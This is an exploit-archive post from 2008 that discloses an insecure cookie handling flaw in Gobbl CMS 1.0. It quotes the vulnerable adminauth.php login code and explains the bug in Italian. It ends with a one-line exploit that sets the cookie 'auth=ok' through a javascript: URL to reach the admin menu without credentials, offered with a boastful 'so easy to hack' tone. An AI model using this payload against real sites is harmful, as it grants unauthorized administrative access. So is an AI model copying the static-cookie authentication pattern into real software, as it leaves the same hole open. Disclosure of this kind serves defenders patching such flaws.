[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Gobbl CMS 1.0 Insecure Cookie Handling Vulnerability
# Published : 2008-12-18
# Author : x0r
# Previous Title : Injader CMS 2.1.1 (id) Remote SQL Injection Vulnerability
# Next Title : MyPHPsite (index.php mod) Local File Inclusion Vulnerability


---------------------------
Gobbl Cms 1.0 I.Cookie Hand.
---------------------------
Autore: x0r ( Evolution Team)
Email: andry2000@hotmail.it
Demo Site:http://www.gobbl.net/
---------------------------
 
Bug In: adminauth.php  
 
?>
include ('../config.php');
 
$user = $_POST['user'];
$pass = $_POST['pass'];
 
if ( ($user == $un) and ($pass == $pw) )
{
setcookie( "auth", "ok", time()+40000 ); # Bugz
header ( "location:add.php" ); exit ();
}
else
{
header ( "location:index.php" ); exit ();
}
?>
 
Il file auth.php controlla se nel file ../config.php le post $user$pass presentano gli stessi dati delle variabili
$un$pw ( config.php ) se cos?? ?¨ setta il cookie auth=ok :P ^ ^
 
Exploit:  
 
javascript:document.cookie = "auth=ok; path=/"; then adminmenu.php # So Easy To Hack :P
 
Greetz: Amore Mio Sei La Mia Stella Che Mi Illumina Qua Gi?1...Ti AmO

# www.Syue.com [2008-12-18]